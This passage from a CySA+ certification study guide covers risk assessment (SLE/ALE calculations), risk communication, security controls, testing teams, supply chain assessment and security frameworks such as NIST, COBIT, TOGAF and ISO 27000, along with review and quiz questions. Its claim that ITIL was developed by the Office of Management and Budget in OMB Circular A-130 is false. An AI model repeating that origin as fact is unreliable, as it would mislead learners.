Identify Resource Requirements
After the criticality level of each process, function, and resource
is determined, you need to determine all the resource
requirements for each process, function, and resource. For
example, an organization’s accounting system might rely on a
server that stores the accounting application, another server
that holds the database, various client systems that perform the
accounting tasks over the network, and the network devices and
infrastructure that support the system. Resource requirements
should also consider any human resources requirements. When
human resources are unavailable, the organization can be just
as negatively impacted as when technological resources are
unavailable.
Note
Keep in mind that the priority for any CySA professional should be the safety of
human life. Consider and protect all other organizational resources only after
personnel are safe.
The organization must document the resource requirements for
every resource that would need to be restored when the
disruptive event occurs. This includes device name, operating
system or platform version, hardware requirements, and device
interrelationships.
Identify Recovery Priorities
After all the resource requirements have been identified, the
organization must identify the recovery priorities. Establish
recovery priorities by taking into consideration process
criticality, outage impacts, tolerable downtime, and system
resources. After all this information is compiled, the result is an
information system recovery priority hierarchy.
Three main levels of recovery priorities should be used: high,
medium, and low. The BIA stipulates the recovery priorities but
does not provide the recovery solutions. Those are given in the
disaster recovery plan (DRP).
Recoverability
Recoverability is the ability of a function or system to be
recovered in the event of a disaster or disruptive event. As part
of recoverability, downtime must be minimized. Recoverability
places emphasis on the personnel and resources used for
recovery.
Fault Tolerance
Fault tolerance is provided when a backup component begins
operation when the primary component fails. One of the key
aspects of fault tolerance is the lack of service interruption.
Varying levels of fault tolerance can be achieved at most levels
of the organization based on how much an organization is
willing to spend. However, the backup component often does
not provide the same level of service as the primary component.
For example, an organization might implement a high-speed
OC1 connection to the Internet. However, the backup
connection to the Internet that is used in the event of the failure
of the OC1 line might be much slower but at a much lower cost
of implementation than the primary OC1 connection.
RISK IDENTIFICATION PROCESS
A risk assessment is a tool used in risk management to
identify vulnerabilities and threats, assess the impact of those
vulnerabilities and threats, and determine which controls to
implement. This is also called risk identification. Risk
assessment (or analysis) has four main goals:
Identify assets and asset value.
Identify vulnerabilities and threats.
Calculate threat probability and business impact.
Balance threat impact with countermeasure cost.
Prior to starting a risk assessment, management and the risk
assessment team must determine which assets and threats to
consider. This process determines the size of the project. The
risk assessment team must then provide a report to
management on the value of the assets considered.
Management can then review and finalize the asset list, adding
and removing assets as it sees fit, and then determine the
budget of the risk assessment project.
Let’s look at a specific scenario to help understand the
importance of system-specific risk analysis. In our scenario, the
Sales division decides to implement touchscreen technology and
tablet computers to increase productivity. As part of this new
effort, a new sales application will be developed that works with
the new technology. At the beginning of the deployment, the
chief security officer (CSO) attempts to prevent the deployment
because the technology is not supported in the enterprise.
Upper management decides to allow the deployment. The CSO
should work with the Sales division and other areas involved so
that the risk associated with the full life cycle of the new
deployment can be fully documented and appropriate controls
and strategies can be implemented during deployment.
Risk assessment should be carried out before any mergers and
acquisitions occur or new technology and applications are
deployed. If a risk assessment is not supported and directed by
senior management, it will not be successful. Management must
define the purpose and scope of a risk assessment and allocate
the personnel, time, and monetary resources for the project.
There are several approaches to performing a risk assessment,
covered in the following sections.
Make Risk Determination Based upon Known Metrics
To make a risk determination, an organization must perform a
formal risk analysis. A formal risk analysis often asks questions
such as these: What corporate assets need to be protected?
What are the business needs of the organization? What outside
threats are most likely to compromise network security?
Different types of risk analysis, including qualitative risk
analysis and quantitative risk analysis, should be used to ensure
that the data obtained is maximized.
Qualitative Risk Analysis
A qualitative risk analysis does not assign monetary and
numeric values to all facets of the risk analysis process.
Qualitative risk analysis techniques include intuition,
experience, and best practice techniques, such as
brainstorming, focus groups, surveys, questionnaires, meetings,
interviews, and Delphi. The Delphi technique is a method used
to estimate the likelihood and outcome of future events.
Although all these techniques can be used, most organizations
will determine the best technique(s) based on the threats to be
assessed. Conducting a qualitative risk analysis requires a risk
assessment team that has experience and education related to
assessing threats.
Each member of the group who has been chosen to participate
in the qualitative risk analysis uses his or her experience to rank
the likelihood of each threat and the damage that might result.
After each group member ranks the threat possibility, loss
potential, and safeguard advantage, data is combined in a report
to present to management.
Two advantages of qualitative over quantitative risk analysis
(discussed next) are that qualitative prioritizes the risks and
identifies areas for immediate improvement in addressing the
threats. Disadvantages of qualitative risk analysis are that all
results are subjective and a dollar value is not provided for
cost/benefit analysis or for budget help.
Note
When performing risk analyses, all organizations experience issues with any
estimate they obtain. This lack of confidence in an estimate is referred to as
uncertainty and is expressed as a percentage. Any reports regarding a risk
assessment should include the uncertainty level.
Quantitative Risk Analysis
A quantitative risk analysis assigns monetary and numeric
values to all facets of the risk analysis process, including asset
value, threat frequency, vulnerability severity, impact, and
safeguard costs. Equations are used to determine total and
residual risks. An advantage of quantitative over qualitative risk
analysis is that quantitative uses less guesswork than
qualitative. Disadvantages of quantitative risk analysis include
the difficulty of the equations, the time and effort needed to
complete the analysis, and the level of data that must be
gathered for the analysis.
Most risk analysis includes some hybrid of both quantitative
and qualitative risk analyses. Most organizations favor using
quantitative risk analysis for tangible assets and qualitative risk
analysis for intangible assets. Keep in mind that even though
quantitative risk analysis uses numeric values, a purely
quantitative analysis cannot be achieved because some level of
subjectivity is always part of the data. This type of estimate
should be based on historical data, industry experience, and
expert opinion.
RISK CALCULATION
A quantitative risk analysis assigns monetary and numeric
values to all facets of the risk analysis process, including asset
value, threat frequency, vulnerability severity, impact, safeguard
costs, and so on. Equations are used to determine total and
residual risks. The most common equations are for single loss
expectancy and annual loss expectancy.
The single loss expectancy (SLE) is the monetary impact of
each threat occurrence. To determine the SLE, you must know
the asset value (AV) and the exposure factor (EF), which
is the percentage value or functionality of an asset that will be
lost when a threat event occurs. The calculation for obtaining
the SLE is as follows:
SLE = AV × EF
For example, an organization has a web server farm with an AV
of $20,000. If the risk assessment has determined that a power
failure is a threat agent for the web server farm and the EF for a
power failure is 25%, the SLE for this event equals $5000.
The annual loss expectancy (ALE) is the expected risk
factor of an annual threat event. To determine the ALE, you
must know the SLE and the annualized rate of occurrence
(ARO), which is the estimate of how often a given threat might
occur annually. The calculation for obtaining the ALE is as
follows:
ALE = SLE × ARO
Using the previously mentioned example, if the risk assessment
has determined that the ARO for the power failure of the web
server farm is 50%, the ALE for this event equals $2500.
Security professionals should keep in mind that this calculation
can be adjusted for geographic distances.
Using the ALE, the organization can decide whether to
implement controls or not. If the annual cost of the control to
protect the web server farm is more than the ALE, the
organization could easily choose to accept the risk by not
implementing the control. If the annual cost of the control to
protect the web server farm is less than the ALE, the
organization should consider implementing the control.
As previously mentioned, even though quantitative risk analysis
uses numeric value, a purely quantitative analysis cannot be
achieved because some level of subjectivity is always part of the
data. In the previous example, how does the organization know
that damage from the power failure will be 25% of the asset?
This type of estimate should be based on historical data,
industry experience, and expert opinion.
Probability
Both qualitative and quantitative risk analysis processes take
into consideration the probability that an event will occur. In
quantitative risk analysis, this consideration is made using the
ARO value for each event. In qualitative risk assessment, each
possible event is assigned a probability value by subject matter
experts.
Magnitude
Both qualitative and quantitative risk analysis processes take
into consideration the magnitude of an event that might occur.
In quantitative risk analysis, this consideration is made using
the SLE and ALE values for each event. In qualitative risk
assessment, each possible event is assigned an impact
(magnitude) value by subject matter experts.
COMMUNICATION OF RISK FACTORS
Technical cybersecurity risks represent a threat that is largely
misunderstood by non-technical personnel. Security
professionals must bridge the knowledge gap in a manner that
the stakeholders understand. To properly communicate
technical risks, security professionals must first understand
their audience and then be able to translate those risks into
business terms that the audience understands.
The audience that needs to understand the technical risks
includes semi-technical audiences, non-technical leadership,
the board of directors and executives, and regulators. The semitechnical audience understands the security operations
difficulties and often consists of powerful allies. Typically, this
audience needs a data-driven, high-level message based on
verifiable facts and trends. The non-technical leadership
audience needs the message to be put in context with their
responsibilities. This audience needs the cost of cybersecurity
expenditures to be tied to business performance. Security
professionals should present metrics that show how cyber risk is
trending, without using popular jargon. The board of directors
and executives are primarily concerned with business risk
management and managing return on assets. The message to
this group should translate technical risk into common business
terms and present metrics about cybersecurity risk and
performance.
Finally, when communicating with regulators, it is important to
be thorough and transparent. In addition, organizations may
want to engage a third party to do a gap assessment before an
audit. This helps security professionals find and remediate
weaknesses prior to the audit and enables the third party to
speak on behalf of the security program.
To frame the technical risks into business terms for these
audiences, security professionals should focus on business
disruption, regulatory issues, and bad press. If a company’s
database is attacked and, as a result, the website cannot sell
products to customers, this is a significant disruption of
business operations. If an incident occurs that results in a
regulatory investigation and fines, a regulatory issue has arisen.
Bad press can result in lost sales and costs to repair the
organization’s image.
Security professionals must understand the risk metrics and
what each metric costs the organization. Although security
professionals may not definitively know the return on
investment (ROI), they should take the security incident
frequency at the organization and assign costs in terms of risk
exposure for every risk. It is also helpful to match the risks with
the assets protected to make sure the organization’s investment
is protecting the most valuable assets.
Moreover, security professionals alone cannot best determine
the confidentiality, integrity, and availability (CIA) levels for
enterprise information assets. Security professionals should
consult with the asset stakeholders to gain their input on which
level should be assigned to each tenet for an information asset.
Keep in mind, however, that all stakeholders should be
consulted. For example, while department heads should be
consulted and have the biggest influence on the CIA decisions
about departmental assets, other stakeholders within the
department and organization should be consulted as well.
This rule holds for any security project that an enterprise
undertakes. Stakeholder input should be critical at the start of
the project to ensure that stakeholder needs are documented
and to gain stakeholder project buy-in. Later, if problems arise
with the security project and changes must be made, the project
team should discuss the potential changes with the project
stakeholders before any project changes are approved or
implemented.
RISK PRIORITIZATION
As previously discussed, by using either quantitative or
qualitative analysis, you can arrive at a priority list that
indicates which issues need to be treated sooner rather than
later and which can wait. In qualitative analysis, one method
used is called a risk assessment matrix. When a qualitative
assessment is conducted, the risks are placed into the following
categories:
High
Medium
Low
Then, a risk assessment matrix, such as the one in Figure 20-1,
is created. Subject experts grade all risks based on their
likelihood and impact. This helps prioritize the application of
resources to the most critical vulnerabilities.
Figure 20-1 Risk Assessment Matrix
Security Controls
Chapter 21, “The Importance of Frameworks, Policies,
Procedures, and Controls,” delves deeply into the types of
controls that can be implemented to address security issues.
The selection of controls that are both cost effective and capable
of addressing the issue depends in large part of how an
organizations chooses to address or handle risk. The following
four basic methods are used to handle risk:
Risk avoidance: Terminating the activity that causes a risk or
choosing an alternative that is not as risky
Risk transfer: Passing on the risk to a third party, such as an
insurance company
Risk mitigation: Defining the acceptable risk level the
organization can tolerate and reducing the risk to that level
Risk acceptance: Understanding and accepting the level of risk
as well as the cost of damages that can occur
Engineering Tradeoffs
In some cases, there may be issues that make implementing a
particular solution inadvisable or impossible. Engineering
tradeoffs are inhibitors to remediation and are covered in the
following sections.
MOUs
A memorandum of understanding (MOU) is a document
that, while not legally binding, indicates a general agreement
between the principals to do something together. An
organization may have MOUs with multiple organizations, and
MOUs may in some instances contain security requirements
that inhibit or prevent the deployment of certain measures.
SLAs
A service-level agreement (SLA) is a document that
specifies a service to be provided by a party, the costs of the
service, and the expectations of performance. These contracts
may exist with third parties from outside the organization and
between departments within an organization. Sometimes these
SLAs may include specifications that inhibit or prevent the
deployment of certain measures.
Organizational Governance
Organizational governance refers to the process of
controlling an organization’s activities, processes, and
operations. When the process is unwieldy, as it is in some very
large organizations, the application of countermeasures may be
frustratingly slow. One of the reasons for including upper
management in the entire process is to use the weight of
authority to cut through the red tape.
Business Process Interruption
The deployment of mitigations cannot be done in such a way
that business operations and processes are interrupted.
Therefore, the need to conduct these activities during off hours
can also be a factor that impedes the remediation of
vulnerabilities.
Degrading Functionality
Finally, some solutions create more issues than they resolve. In
some cases, it may be impossible to implement mitigation due
to the fact that it breaks mission-critical applications or
processes. The organization may need to research an alternative
solution.
SYSTEMS ASSESSMENT
Systems assessment comprises a process whereby systems
are fully vetted for potential issues from both a functionality
standpoint and a security standpoint. These assessments
(discussed more fully in Chapter 21) can lead to two types of
organizational approvals: accreditation and certification.
Although the terms are used as synonyms in casual
conversation, accreditation and certification are two different
concepts in the context of assurance levels and ratings.
However, they are closely related. Certification evaluates the
technical system components, whereas accreditation occurs
when the adequacy of a system’s overall security is accepted by
management.
ISO/IEC 27001
ISO/IEC 27001:2013 is the current version of the 27001
standard, and it is one of the most popular standards by which
organizations obtain certification for information security. It
provides guidance on ensuring that an organization’s
information security management system (ISMS) is properly
established, implemented, maintained, and continually
improved. It includes the following components:
ISMS scope
Information security policy
Risk assessment process and its results
Risk treatment process and its decisions
Information security objectives
Information security personnel competence
Necessary ISMS-related documents
Operational planning and control document
Information security monitoring and measurement evidence
ISMS internal audit program and its results
Top management ISMS review evidence
Evidence of identified nonconformities and corrective actions
When an organization decides to obtain ISO/IEC 27001
certification, a project manager should be selected to ensure
that all the components are properly completed.
To implement ISO/IEC 27001:2013, the project manager should
complete the following steps:
Step 1. Obtain management support.
Step 2. Determine whether to use consultants or to complete
the work in-house, purchase the 27001 standard, write
the project plan, define the stakeholders, and organize
the project kickoff.
Step 3. Identify the requirements.
Step 4. Define the ISMS scope, information security policy,
and information security objectives.
Step 5. Develop document control, internal audit, and
corrective action procedures.
Step 6. Perform risk assessment and risk treatment.
Step 7. Develop a statement of applicability and a risk
treatment plan and accept all residual risks.
Step 8. Implement the controls defined in the risk treatment
plan and maintain the implementation records.
Step 9. Develop and implement security training and
awareness programs.
Step 10. Implement the ISMS, maintain policies and
procedures, and perform corrective actions.
Step 11. Maintain and monitor the ISMS.
Step 12. Perform an internal audit and write an audit report.
Step 13. Perform management review and maintain
management review records.
Step 14. Select a certification body and complete
certification.
Step 15. Maintain records for surveillance visits.
For more information, visit
https://www.iso.org/standard/54534.html.
ISO/IEC 27002
ISO/IEC 27002:2013 is the current version of the 27002
standard, and it provides a code of practice for information
security management. It includes the following 14 content
areas:
Information security policy
Organization of information security
Human resources security
Asset management
Access control
Cryptography
Physical and environmental security
Operations security
Communications security
Information systems acquisition, development, and maintenance
Supplier relationships
Information security incident management
Information security aspects of business continuity
Compliance
For more information, visit
https://www.iso.org/standard/54533.html.
DOCUMENTED COMPENSATING
CONTROLS
As pointed out in the section “Engineering Tradeoffs” earlier in
this chapter, in some cases, there may be issues that make
implementing a particular solution inadvisable or impossible.
Not all weaknesses can be eliminated. In some cases, they can
only be mitigated. This can be done by implementing controls
that compensate for a weakness that cannot be completely
eliminated. A compensating control reduces the potential risk.
Compensating controls are also referred to as countermeasures
and safeguards. Three things must be considered when
implementing a compensating control: vulnerability, threat, and
risk. For example, a good countermeasure might be to
implement the appropriate ACL and encrypt the data. The ACL
protects the integrity of the data, and the encryption protects
the confidentiality of the data.
Compensating controls are put in place to substitute for a
primary access control and mainly act to mitigate risks. By
using compensating controls, you can reduce risk to a more
manageable level. Examples of compensating controls include
requiring two authorized signatures to release sensitive or
confidential information and requiring two keys owned by
different personnel to open a safety deposit box. These
compensating controls must be recorded along with the reason
the primary control was not implemented. Compensating
controls are covered further in Chapter 21.
TRAINING AND EXERCISES
Security analysts must practice responding to security events in
order to react to them in the most organized and efficient
manner. There are some well-established ways to approach this.
This section looks at how teams of analysts, both employees and
third-party contractors, can be organized and some wellestablished names for these teams. Security posture is typically
assessed by war game exercises in which one group attacks the
network while another attempts to defend the network. These
games typically have some implementation of the following
teams.
Red Team
The red team acts as the attacking force. It typically carries out
penetration tests by following a well-established process of
gathering information about the network, scanning the network
for vulnerabilities, and then attempting to take advantage of the
vulnerabilities. The actions they can take are established ahead
of time in the rules of engagement. Often these individuals are
third-party contractors with no prior knowledge of the network.
This helps them simulate attacks that are not inside jobs.
Blue Team
The blue team acts as the network defense team, and the
attempted attack by the red team tests the blue team’s ability to
respond to the attack. It also serves as practice for a real attack.
This includes accessing log data, using a SIEM, garnering
intelligence information, and performing traffic and data flow
analysis.
White Team
The white team is a group of technicians who referee the
encounter between the red team and the blue team. Enforcing
the rules of engagement might be one of the white team’s roles,
along with monitoring the responses to the attack by the blue
team and making note of specific approaches employed by the
red team.
Tabletop Exercise
Conducting a tabletop exercise is the most cost-effective and
efficient way to identify areas of vulnerability before moving on
to higher-level testing. A tabletop exercise is an informal
brainstorming session that encourages participation from
business leaders and other key employees. In a tabletop
exercise, the participants agree to determine a particular attack
scenario upon which they then focus.
SUPPLY CHAIN ASSESSMENT
Organizational risk mitigation requires assessing the safety and
the integrity of the hardware and software before the
organization purchases it. The following are some of the
methods used to assess the supply chain through which a
hardware or software product flows to ensure that the product
does not pose a security risk to the organization.
Vendor Due Diligence
When performing due diligence with regard to a vendor, it
means that we are assessing the vendor with regard to the
vendor’s products and services. While surely we are concerned
with the functionality and value of the products, we are even
more concerned about the innate security of such products.
Stories about counterfeit gear that contains backdoors have
circulated for years and are not unfounded. Online resources for
conducting due diligence about vendors include
https://complyadvantage.com/knowledgebase/vendor-duediligence/#:~:text=The%20vendor%20%28target%20company
%29%20engages%20a%20third%20party,the%20commenceme
nt%20of%20the%20sale%20or%20partnership%20arrangeme
nt.
OEM Documentation
One of the ways you can reduce the likelihood of purchasing
counterfeit equipment is to insist on the inclusion of verifiable
original equipment manufacturer (OEM) documentation. In
many cases, this paperwork includes anti-counterfeiting
features. Make sure to use the vendor website to verify all the
various identifying numbers in the documentation.
Hardware Source Authenticity
When purchasing hardware to support any network or security
solution, a security professional must ensure that the
hardware’s authenticity can be verified. Just as expensive
consumer items such as purses and watches can be
counterfeited, so can network equipment. Whereas the dangers
with counterfeit consumer items are typically confined to a lack
of authenticity and potentially lower quality, the dangers
presented by counterfeit network gear can extend to the
presence of backdoors in the software or firmware. Always
purchase equipment directly from the manufacturer when
possible, and when purchasing from resellers, use caution and
insist on a certificate of authenticity. In any case where the price
seems too good to be true, keep in mind that it may be an
indication the gear is not authentic.
Trusted Foundry
The Trusted Foundry program can help you exercise care
in ensuring the authenticity and integrity of the components of
hardware purchased from a vendor. This DoD program
identifies “trusted vendors” and ensures a “trusted supply
chain.” A trusted supply chain begins with trusted design and
continues with trusted mask, foundry, packaging/assembly, and
test services. It ensures that systems have access to leading-edge
integrated circuits from secure, domestic sources. At the time of
this writing, 77 vendors have been certified as trusted.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 20-2
lists a reference of these key topics and the page numbers on
which each is found.
Table 20-2 Key Topics in Chapter 20
Key Topic Element
Description
Page Number
Bulleted list
Main steps of the BIA
530
Bulleted list
Risk assessment goals
532
Section
Quantitative risk analysis
534
Figure 20-1
Risk assessment matrix
537
Bulleted list
Methods used to handle risk
538
Step list
Implementing ISO/IEC 27001:2013
540
Sections
Testing teams
542
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
business impact analysis (BIA)
Business Continuity Planning (BCP) committee
recoverability
fault tolerance
risk assessment
qualitative risk analysis
quantitative risk analysis
single loss expectancy (SLE)
annual loss expectancy (ALE)
asset value (AV)
exposure factor (EF)
annualized rate of occurrence (ARO)
risk assessment matrix
risk avoidance
risk transfer
risk mitigation
risk acceptance
memorandum of understanding (MOU)
service-level agreement (SLA)
organizational governance
systems assessment
ISO/IEC 27001:2013
ISO/IEC 27002:2013
red team
blue team
white team
tabletop exercise
Trusted Foundry program
REVIEW QUESTIONS
1. The vulnerability analysis and risk assessment may be
performed by the __________________ or by a
separately appointed risk assessment team.
2. List the four main steps of the BIA in order.
3. Match the following terms with their definitions.
Ter
ms
Definitions
BI
A
Acts as the attacking force during testing
R
ed
te
a
m
Lists the critical and necessary business functions, their
resource dependencies, and their level of criticality to the
overall organization
Bl
ue
te
a
m
Group of technicians who referee the encounter during
testing
W
hi
te
te
a
m
Acts as the network defense team during testing
4. ____________________ assigns monetary and numeric
values to all facets of the risk analysis process, including
asset value, threat frequency, vulnerability severity, impact,
and safeguard costs.
5. An organization has a web server farm with an AV of
$20,000. If the risk assessment has determined that a power
failure is a threat agent for the web server farm and the EF
for a power failure is 25%, the SLE for this event equals
$_____________.
6. Match the following terms with their definitions.
Terms
Definitions
Tabletop
exercise
Performs vulnerability analysis and risk
assessment
Business
Continuity
Planning (BCP)
committee
Process of controlling an organization’s
activities, processes, and operations
Organizational
governance
An informal brainstorming session that
encourages participation from business
leaders and other key employees
7. The _______________________ helps prioritize the
application of resources to the most critical vulnerabilities
during qualitative risk assessment.
8. List and define at least two ways to handle risk.
9. Match the following terms with their definitions.
Ter
ms
Definitions
M
O
U
Document that specifies a service to be provided by a party
S
Performs vulnerability analysis and risk assessment
L
A
B
C
P
Functional analysis that occurs as part of business
continuity and disaster recovery
B
I
A
Document that, while not legally binding, indicates a general
agreement between the principals to do something together
10. ALE = ________________
Chapter 21
The Importance of
Frameworks, Policies,
Procedures, and Controls
This chapter covers the following topics related to Objective 5.3
(Explain the importance of frameworks, policies, procedures, and
controls) of the CompTIA Cybersecurity Analyst (CySA+) CS0-002
certification exam:
Frameworks: Covers both risk-based and prescriptive
frameworks.
Policies and procedures: Includes code of conduct/ethics,
acceptable use policy (AUP), password policy, data ownership, data
retention, account management, continuous monitoring, and work
product retention.
Category: Describes the managerial, operational, technical
categories.
Control type: Covers the preventative, detective, corrective,
deterrent, compensating, and physical control types.
Audits and assessments: Discusses regulatory and compliance
audits.
Organizations use policies, procedures, and controls to
implement security. Policies are broad statements that define
what the aim of the security measure is, while procedures define
how to carry out the measures. Controls are countermeasures or
mitigations that are used to prevent breaches. Creating and
implementing policies, procedures, and controls can be a
challenge. Help is available, however, from security frameworks
created by various entities. Help is available through templates,
examples, and other documents that organizations can use to
ensure that they have covered all bases. This chapter explains
what policies, procedures, and controls are and describes how
security frameworks can be used to create them.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these eight self-assessment questions, you might
want to move ahead to the “Exam Preparation Tasks.” Table 211 lists the major headings in this chapter and the “Do I Know
This Already?” quiz questions covering the material in those
headings so you can assess your knowledge of these specific
areas. The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 21-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Questions
Frameworks
1, 2
Policies and Procedures
3, 4
Category
9, 10
Control Type
5, 6
Audits and Assessments
7, 8
1. Which of the following is not one of the four interrelated
domains of the Open Group Architecture Framework
(TOGAF) four interrelated domains?
1. Business architecture
2. Data architecture
3. Security architecture
4. Technology architecture
2. Which of the following is not one of the classes of controls
described by NIST SP 800-53 Rev 4?
1. Access Control
2. Awareness and Training
3. Contingency Planning
4. Facility Security
3. Which of the following policies is intended to demonstrate a
commitment to ethics?
1. Non-compete
2. Non-disclosure
3. Expectation of privacy
4. Code of conduct
4. Which of the following consists of single words that often
include a mixture of upper- and lowercase letters?
1. Standard word passwords
2. Complex passwords
3. Passphrase passwords
4. Cognitive passwords
5. Which of the following controls are implemented to
administer the organization’s assets and personnel and
include security policies, procedures, standards, baselines,
and guidelines that are established by management?
1. Managerial
2. Physical
3. Technical
4. Logical
6. Which operational control type would include security
guards?
1. Detective
2. Preventative
3. Deterrent
4. Directive
7. Which of the following reports focuses on internal controls
over financial reporting?
1. SOC 1
2. SOC 2
3. SOC 3
4. SOC 4
8. Which of the following standards verifies the controls and
processes and requires a written assertion regarding the
design and operating effectiveness of the controls being
reviewed?
1. SSAE 16
2. HIPAA
3. GLBA
4. CFAA
9. When you implement a new password policy what category
of control have you implemented?
1. Managerial
2. Operational
3. Technical
4. Preventative
10. Which of the following controls is a directive control?
1. A new firewall
2. A policy forbidding USB drives
3. A No Admittance sign at the server room door
4. A biometric authentication system
FOUNDATION TOPICS
FRAMEWORKS
Many organizations have developed security management
frameworks and methodologies to help guide security
professionals. These frameworks and methodologies include
security program development standards, enterprise and
security architect development frameworks, security control
development methods, corporate governance methods, and
process management methods. The following sections discuss
the major frameworks and methodologies and explain where
they are used.
Risk-Based Frameworks
Some frameworks are designed to help organizations organize
their approach and response to risk. Frameworks in this section
are risk-based.
National Institute of Standards and Technology (NIST)
NIST SP 800-53 Rev 4 is a security controls development
framework developed by the NIST body of the U.S. Department
of Commerce. Table 21-2 lists the NIST SP 800-53 Rev 44
control families.
Table 21-2 NIST SP 800-53 Rev 4 Control Families
Family
Access Control
Audit and Accountability
Awareness and Training
Security Assessment and Authorization
Configuration Management
Contingency Planning
Incident Response
Maintenance
Media Protection
Personnel Security
Physical and Environmental Protection
Planning
Risk Assessment
System and Communications Protection
System and Information Integrity
System and Services Acquisition
NIST SP 800-55 Rev 1 is an information security metrics
framework that provides guidance on developing performance
measuring procedures with a U.S. government viewpoint.
COBIT
The governance and management objectives in COBIT 2019 are
grouped into five domains. The domains have names with verbs
that express the key purpose and areas of activity of the
objectives contained in them. The five domain are
Evaluate, Direct, and Monitor (EDM)
Align, Plan, and Organize (APO)
Build, Acquire, and Implement (BAI)
Deliver, Service, and Support (DSS)
Monitor, Evaluate, and Assess (MEA)
The Cobit 2019 Goals Cascade (shown in Figure 21-1) supports
translation of enterprise goals into priorities for alignment
goals.
Figure 21-1 The Cobit 2019 Goals Cascade
The Open Group Architecture Framework (TOGAF)
The Open Group Architecture Framework (TOGAF),
another enterprise architecture framework, helps organizations
design, plan, implement, and govern an enterprise information
architecture. The latest version, TOGAF 9.2, was launched in
2018. TOGAF is based on
Business architecture: Business strategy, governance,
organization, and key business processes
Application architecture: Individual systems to be deployed,
interactions between the application systems, and their
relationships to the core business processes
Data architecture: Structure of an organization’s logical and
physical data assets
Technology architecture: Hardware, software, and network
infrastructure
The Architecture Development Method (ADM), as prescribed by
TOGAF, is applied to develop an enterprise architecture that
meets the business and information technology needs of an
organization. Figure 21-2 shows the process, which is iterative
and cyclic. Each step checks with requirements.
Figure 21-2 TOGAF ADM Model
Prescriptive Frameworks
Some frameworks are designed to provide organizations with a
list of activities that comprise a prescription for handling
certain security issues common to all. The frameworks
described in this section are prescriptive.
NIST Cybersecurity Framework Version 1.1
NIST created the Framework for Improving Critical
Infrastructure Cybersecurity, or simply the NIST
Cybersecurity Framework version 1.1, in 2018. It focuses
exclusively on IT security and is composed of three parts:
Framework Core: The core presents five cybersecurity functions,
each of which is further divided into categories and subcategories. It
describes desired outcomes for these functions. As you can see in
Figure 21-3, each function has informative references available to
help guide the completion of that subcategory of a particular
function.
Figure 21-3 Framework Core Structure
Implementation Tiers: These tiers are levels of sophistication in
the risk management process that organizations can aspire to reach.
These tiers can be used as milestones in the development of an
organization’s risk management process. The four tiers, from least
developed to most developed, are Partial, Risk Informed,
Repeatable, and Adaptive.
Framework Profiles: Profiles can be used to compare the current
state (or profile) to a target state (profile). This enables an
organization to create an action plan to close gaps between the two.
ISO 27000 Series
The International Organization for Standardization (ISO), often
incorrectly referred to as the International Standards
Organization, joined with the International Electrotechnical
Commission (IEC) to standardize the British Standard 7799
(BS7799) to a new global standard that is now referred to as the
ISO/IEC 27000 Series. ISO/IEC 27000 is a security program
development standard on how to develop and maintain an
information security management system (ISMS).
The 27000 Series includes a list of standards, each of which
addresses a particular aspect of ISMS. These standards are
either published or in development. The following standards are
included as part of the ISO/IEC 27000 Series at this writing:
27000: Published overview of ISMS and vocabulary
27001: Published ISMS requirements
27002: Published code of practice for information security controls
27003: Published ISMS implementation guidelines
27004: Published ISMS measurement guidelines
27005: Published information security risk management
guidelines
27006: Published requirements for bodies providing audit and
certification of ISMS
27007: Published ISMS auditing guidelines
27008: Published auditor of ISMS guidelines
27010: Published information security management for intersector and interorganizational communications guidelines
27011: Published telecommunications organizations information
security management guidelines
27013: Published integrated implementation of ISO/IEC 27001
and ISO/IEC 20000-1 guidance
27014: Published information security governance guidelines
27015: Published financial services information security
management guidelines
27016: Information security economics
27017: In-development cloud computing services information
security control guidelines based on ISO/IEC 27002
27018: Published code of practice for protection of personally
identifiable information (PII) in public clouds acting as PII
processors
27019: Published energy industry process control system ISMS
guidelines based on ISO/IEC 27002
27021: Published competence requirements for information
security management systems professionals
27023: Published mapping the revised editions of ISO/IEC 27001
and ISO/ IEC 27002
27031: Published information and communication technology
readiness for business continuity guidelines
27032: Published cybersecurity guidelines
27033-1: Published network security overview and concepts
27033-2: Published network security design and implementation
guidelines
27033-3: Published network security threats, design techniques,
and control issues guidelines
27033-4: Published securing communications between networks
using security gateways
27033-5: Published securing communications across networks
using virtual private networks (VPN)
27033-6: In-development securing wireless IP network access
27034-1: Published application security overview and concepts
27034-2: In-development application security organization
normative framework guidelines
27034-3: In-development application security management
process guidelines
27034-4: In-development application security validation
guidelines
27034-5: In-development application security protocols and
controls data structure guidelines
27034-6: In-development security guidance for specific
applications
27034-7: In-development guidance for application security
assurance prediction
27035: Published information security incident management
guidelines
27035-1: In-development information security incident
management principles
27035-2: In-development information security incident response
readiness guidelines
27035-3: In-development computer security incident response
team (CSIRT) operations guidelines
27036-1: Published information security for supplier relationships
overview and concepts
27036-2: Published information security for supplier relationships
common requirements guidelines
27036-3: Published information and communication technology
(ICT) supply chain security guidelines
27036-4: In-development guidelines for security of cloud services
27037: Published digital evidence identification, collection,
acquisition, and preservation guidelines
27038: Published information security digital redaction
specification
27039: Published intrusion detection systems (IDS) selection,
deployment, and operations guidelines
27040: Published storage security guidelines
27041: Published guidance on assuring suitability and adequacy of
incident investigative method
27042: Published digital evidence analysis and interpretation
guidelines
27043: Published incident investigation principles and processes
27044: In-development security information and event
management (SIEM) guidelines
27050: In-development electronic discovery (eDiscovery)
guidelines
27799: Published information security in health organizations
guidelines
These standards are developed by the ISO/IEC bodies, but
certification or conformity assessment is provided by third
parties.
Note
You can find more information regarding ISO standards at https://www.iso.org.
SABSA
SABSA is an enterprise security architecture framework that
uses the six communication questions (What, Where, When,
Why, Who, and How) that intersect with six layers (operational,
component, physical, logical, conceptual, and contextual). It is a
risk-driven architecture. See Table 21-3.
ITIL
ITIL is a process management development standard
developed by the Office of Management and Budget in OMB
Circular A-130 and owned by AXELOS since 2013. ITIL has five
core publications: ITIL Service Strategy, ITIL Service Design,
ITIL Service Transition, ITIL Service Operation, and ITIL
Continual Service Improvement. These five core publications
contain 26 processes. Although ITIL has a security component,
it is primarily concerned with managing the service-level
agreements (SLAs) between an IT department or organization
